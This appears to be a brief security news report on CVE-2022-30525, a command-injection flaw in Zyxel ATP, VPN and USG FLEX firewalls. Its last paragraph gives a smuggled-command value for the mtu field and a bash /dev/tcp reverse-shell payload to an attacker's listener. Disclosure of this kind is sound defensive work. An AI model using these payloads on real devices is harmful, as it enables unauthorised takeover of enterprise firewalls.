A critical vulnerability (CVE-2022-30525) has been identified in the Zyxel ATP, VPN, and USG FLEX series devices designed to organize the operation of firewalls, IDS, and VPN in enterprises. To carry out an attack, an attacker must be able to send requests to the device via the HTTP/HTTPS protocol. Zyxel has fixed the vulnerability in the ZLD 5.30 firmware update. According to the Shodan service, there are currently 16213 potentially vulnerable devices on the global network that accept requests via HTTP/HTTPS.
Operation is performed by sending specially designed commands to the /ztp/cgi-bin/handler web handler, accessible without authentication. The problem is caused by the lack of proper cleaning of query parameters when executing commands in the system using the os.system call used in the lib_wan_settings.py library and performed when processing the setWanPortSt operation.
For example, an attacker can pass in the mtu field the string "; ping 192.168.1.210;" which will result in the command "ping 192.168.1.210" being executed on the system. To gain access to the command shell, you can run "nc -lvnp 1270" on your system, and then initiate a reverse connection (reverse shell) by sending a request to the device with the parameter '; bash -c \"exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\";'.
Source: opennet.ru